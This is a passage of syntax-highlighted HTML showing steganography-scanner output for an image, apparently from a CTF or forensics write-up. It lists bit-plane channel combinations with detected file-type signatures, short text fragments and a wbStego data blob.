Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,bgr,msb,yx .. file: ddis/ddif</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b1,bgr,lsb,yx,prime .. <wbStego size=283504, data=</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"4\xC3M\x9A\e\x82\xB8Qu\x1A\xD1TUi$ \xCAd\na(2K\x10\x01UE@\x88t\x88\xA0\x04\xDA?\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC\xB2J1\eX,\xD4\t\x1E\x92\b4\xD6HM\x9Bbp\xC7K\x03\x90\xCDt\xB2\x88\xE4\x9BO\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFEF\xA09\xC8\x96\x8F\t\f9\x95\x94\xC75\x86PL\xDC0\xE8V\xCAH&\x12E\x17\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\xA2B\xD0\xA4*\xA8B\x82B\x80@I6\x90\x1Ch\xC6\xC9H\x93\x1DB\x92\v\x04\x7F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF4\x93\x19#\xC7M\\\xBA\x9D\xA1r"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, even=</span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">false</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, mix=</span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">true</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, controlbyte=</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"H"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,r,msb,yx,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"UU}w]UUU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,yx,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"UUUu___uW"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,b,msb,yx,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"UUUWwW]W"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,bgr,msb,yx,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"u]uU_w}]Uw}"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b3,rgb,lsb,yx,prime .. file: very old 16-bit-int big-endian archive</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,r,msb,yx,prime .. text: [</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"w"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> repeated 8 </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">times</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b5,rgb,lsb,yx,prime .. file: MPEG ADTS, layer II, v1, 384 kbps, JntStereo</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,r,msb,yx,prime .. file: MPEG ADTS, layer I, v2, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,g,msb,yx,prime .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,r,lsb,yx,prime .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,g,lsb,yx,prime .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,rgb,msb,yx,prime .. file: ddis/ddif</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,r,msb,YX .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"]_u}WW]]wUW"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,YX .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"WUUwu]w}"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b1,bgr,msb,YX,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"A8MQ<Mf(,1"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,b,msb,YX,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"UWU}U}UUU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b1,g,msb,Xy .. file: Targa image data - RLE 384 x 64 x 32 +16448 - 8-bit alpha - interleave</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,lsb,Xy .. file: 5View capture file</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,Xy .. file: VISX image file</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,rgb,msb,Xy .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"WWUW]]uu"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,g,msb,Xy .. text: [</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"w"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> repeated 9 </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">times</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,b,msb,Xy .. file: MPEG ADTS, layer I, v2, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b6,bgr,msb,Xy .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,b,lsb,Xy .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b7,bgr,lsb,Xy .. file: , 48 kHz, Monaural</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,r,msb,Xy .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,g,msb,Xy .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b8,rgb,msb,Xy .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b1,g,lsb,Xy,prime .. file: shared library</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b1,rgb,lsb,Xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">")&Pa'HaE"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,g,msb,Xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"U]UUUUuuU]UwUUW]UUUwUUUUUuU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,b,msb,Xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"]UUUUUUUUUwUUUU]UUUWUUUUU]"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,rgb,msb,Xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"W}UWu}WUUWw]WU]Uu]"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b2,bgr,msb,Xy,prime .. text: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"WuWuUUuU"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,r,msb,Xy,prime .. file: RDI Acoustic Doppler Current Profiler (ADCP)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,g,msb,Xy,prime .. text: [</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"w"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> repeated 8 </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">times</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">b4,b,msb,Xy,prime .. text: [</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"w"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> repeated 19 </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">times</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: 